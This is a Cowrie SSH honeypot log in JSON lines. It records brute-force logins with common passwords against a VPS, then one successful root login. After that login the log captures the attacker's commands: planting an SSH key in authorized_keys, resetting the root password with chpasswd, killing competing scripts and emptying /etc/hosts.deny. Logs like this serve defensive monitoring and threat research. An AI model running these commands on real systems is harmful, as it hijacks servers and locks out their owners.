{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:48:03.503956Z","src_ip":"212.227.125.160","session":"c1a3f4fb9997"}
{"eventid":"cowrie.login.failed","username":"developer","password":"111111","message":"login attempt [developer/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:04.414312Z","src_ip":"212.227.125.160","session":"c1a3f4fb9997"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:48:05.585550Z","src_ip":"212.227.125.160","session":"c1a3f4fb9997"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42642,"dst_ip":"1.2.3.4","dst_port":22,"session":"271cbd0fb34d","protocol":"ssh","message":"New connection: 212.227.125.160:42642 (1.2.3.4:22) [session: 271cbd0fb34d]","sensor":"my-vps","timestamp":"2025-08-28T13:48:40.433144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:48:40.434021Z","src_ip":"212.227.125.160","session":"271cbd0fb34d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:48:40.598558Z","src_ip":"212.227.125.160","session":"271cbd0fb34d"}
{"eventid":"cowrie.login.failed","username":"developer","password":"1234567","message":"login attempt [developer/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:41.096670Z","src_ip":"212.227.125.160","session":"271cbd0fb34d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:48:42.263316Z","src_ip":"212.227.125.160","session":"271cbd0fb34d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":13135,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea1198f68bc7","protocol":"ssh","message":"New connection: 80.94.95.112:13135 (1.2.3.4:22) [session: ea1198f68bc7]","sensor":"my-vps","timestamp":"2025-08-28T13:48:51.411345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:48:51.412531Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:48:51.442851Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"3141","message":"login attempt [admin/3141] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:51.646730Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"3110","message":"login attempt [admin/3110] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:52.679931Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31081994","message":"login attempt [admin/31081994] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:53.713110Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31071981","message":"login attempt [admin/31071981] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:54.745944Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31051984","message":"login attempt [admin/31051984] failed","sensor":"my-vps","timestamp":"2025-08-28T13:48:55.778340Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:48:56.811710Z","src_ip":"80.94.95.112","session":"ea1198f68bc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52022,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ddd41349169","protocol":"ssh","message":"New connection: 212.227.125.160:52022 (1.2.3.4:22) [session: 6ddd41349169]","sensor":"my-vps","timestamp":"2025-08-28T13:49:17.156557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:49:17.157370Z","src_ip":"212.227.125.160","session":"6ddd41349169"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:49:17.331645Z","src_ip":"212.227.125.160","session":"6ddd41349169"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:49:17.840186Z","src_ip":"212.227.125.160","session":"6ddd41349169"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:49:19.010812Z","src_ip":"212.227.125.160","session":"6ddd41349169"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50608,"dst_ip":"1.2.3.4","dst_port":22,"session":"760042448cfe","protocol":"ssh","message":"New connection: 212.227.125.160:50608 (1.2.3.4:22) [session: 760042448cfe]","sensor":"my-vps","timestamp":"2025-08-28T13:49:55.106324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:49:55.107336Z","src_ip":"212.227.125.160","session":"760042448cfe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:49:55.275935Z","src_ip":"212.227.125.160","session":"760042448cfe"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"password","message":"login attempt [deploy/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:49:55.993304Z","src_ip":"212.227.125.160","session":"760042448cfe"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:49:57.163991Z","src_ip":"212.227.125.160","session":"760042448cfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44798,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bf373e5e604","protocol":"ssh","message":"New connection: 212.227.235.229:44798 (1.2.3.4:22) [session: 2bf373e5e604]","sensor":"my-vps","timestamp":"2025-08-28T13:49:57.730867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:49:57.732038Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:49:57.940588Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.login.success","username":"root","password":"123ABCdef","message":"login attempt [root/123ABCdef] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:49:58.816721Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:49:59.255020Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:49:59.255736Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:49:59.256946Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:49:59.466613Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:49:59.942086Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:49:59.942915Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:50:00.153810Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:00.154774Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62765,"dst_ip":"1.2.3.4","dst_port":22,"session":"09ff2e6ce235","protocol":"ssh","message":"New connection: 212.227.235.229:62765 (1.2.3.4:22) [session: 09ff2e6ce235]","sensor":"my-vps","timestamp":"2025-08-28T13:50:02.392717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:50:02.415726Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:50:02.544797Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:50:03.150570Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd1234","message":"login attempt [user/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T13:50:04.290505Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.login.failed","username":"user","password":"ghbdtn","message":"login attempt [user/ghbdtn] failed","sensor":"my-vps","timestamp":"2025-08-28T13:50:05.427348Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.login.failed","username":"user","password":"abc123","message":"login attempt [user/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:50:06.559255Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.login.failed","username":"user","password":"abcd123","message":"login attempt [user/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:50:07.690852Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:08.822741Z","src_ip":"212.227.235.229","session":"09ff2e6ce235"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:12.397000Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:50:12.397982Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:12.608572Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:13.088109Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"echo \"root:baMjV8hspAGn\"|chpasswd|bash","message":"CMD: echo \"root:baMjV8hspAGn\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-28T13:50:13.088967Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7372addf22304a131a551259b3515817e58fd895c5c0168ee8952d26041d3473","size":21,"shasum":"7372addf22304a131a551259b3515817e58fd895c5c0168ee8952d26041d3473","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7372addf22304a131a551259b3515817e58fd895c5c0168ee8952d26041d3473 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:50:13.299073Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:50:13.739876Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-28T13:50:13.740608Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-28T13:50:13.952686Z","src_ip":"212.227.235.229","session":"2bf373e5e604"}
